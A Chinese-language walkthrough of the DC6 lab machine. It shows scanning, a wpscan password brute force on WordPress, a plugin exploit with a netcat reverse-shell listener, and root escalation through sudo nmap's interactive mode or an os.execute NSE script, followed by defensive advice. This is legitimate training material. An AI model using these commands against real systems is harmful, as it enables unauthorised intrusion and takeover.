DC6靶机渗透测试教学文档

信息收集阶段

主机发现

使用netdiscover进行主机发现：

netdiscover -i eth0 -r 192.168.84.0/24

发现目标IP为192.168.84.182

端口扫描

使用masscan进行快速端口扫描：

masscan 192.168.84.182 --rate=1000 -p 0-65535

使用nmap对80端口进行详细扫描：

nmap -sV -p 80 192.168.84.182

Web应用测试

访问Web服务

直接访问目标IP+端口会跳转到wordy域名，需要修改hosts文件：

echo "192.168.84.182 wordy" >> /etc/hosts

WordPress识别

站点由WordPress搭建，使用wpscan进行扫描：

wpscan --url http://wordy/

用户枚举

根据nmap扫描结果获取用户名，形成用户名字典(user.txt)，使用wpscan进行爆破：

wpscan --url http://wordy/ -U ./user.txt -P /usr/share/wordlists/rockyou.txt

成功获取凭证：

• 用户名：mark
• 密码：helpdesk01

漏洞利用

插件漏洞利用

1. 登录WordPress后台后发现使用了特定插件
2. 搜索该插件历史漏洞，发现编号45274的漏洞
3. 将POC部分复制出来单独形成文件(poc.html)
4. 在本机开启HTTP服务：

python -m http.server 80

5. 访问poc.html同时开启监听：

nc -lvnp 4444

6. 成功获取反向shell

权限提升

1. 获取标准终端：

python -c 'import pty;pty.spawn("/bin/bash")'

2. 在mark家目录发现graham的密码：

cat /home/mark/stuff/things-to-do.txt

获取密码：GSo7isUM1D4

3. SSH登录graham账户：

ssh graham@localhost

4. 检查sudo权限：

sudo -l

发现可以无密码执行特定.sh文件

5. 检查jens用户权限：

sudo -l -U jens

发现可以以root身份执行nmap

最终提权

1. 利用nmap的交互模式提权：

sudo nmap --interactive
nmap> !sh

2. 或者创建nmap脚本提权：

os.execute("/bin/bash")

保存为script.nse并执行：

sudo nmap --script=script.nse

关键知识点总结

1. 主机发现：netdiscover适用于本地网络主机发现
2. 端口扫描：masscan快速扫描，nmap详细扫描
3. WordPress枚举：wpscan工具的用户名爆破
4. 插件漏洞利用：识别插件版本并搜索已知漏洞
5. 权限提升路径：
   • 通过低权限用户查找敏感信息
   • 利用sudo权限执行特定命令
   • 利用nmap的交互模式或脚本功能提权

防御建议

1. 及时更新WordPress核心和插件
2. 限制sudo权限，避免不必要的root权限分配
3. 使用强密码策略，避免使用常见密码
4. 定期检查系统上的敏感文件权限
5. 禁用或限制nmap等工具的sudo权限